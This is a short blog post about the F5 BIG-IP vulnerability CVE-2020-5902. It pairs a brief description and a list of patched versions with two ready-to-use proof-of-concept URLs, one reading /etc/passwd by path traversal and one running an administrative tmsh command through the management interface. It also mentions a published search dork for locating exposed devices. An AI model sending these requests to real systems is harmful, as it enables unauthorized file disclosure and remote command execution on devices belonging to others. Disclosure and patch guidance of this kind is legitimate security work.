F5 Big IP vulnerability CVE-2020–5902
Hi Readers! Saturday with Dork, I have posted dork of Big-IP vulnerability on Twitter. Attackers can run commands as an unauthorized user and completely compromise a system, including interception of controller application traffic. The vulnerability can be exploited remotely.
Vulnerability CVE-2020–5902 received a CVSS score of 10, indicating the highest degree of danger. To exploit it, an attacker needs to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.
Proof of Concept LFI
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
Proof of Concept RCE
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
Proof of concept CVE-2020–5902
Affected companies are advised to update. Vulnerable versions of BIG-IP (11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x) should be updated versions (11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4).
If you like then share with your friends and infosec people :)
Hire me :)
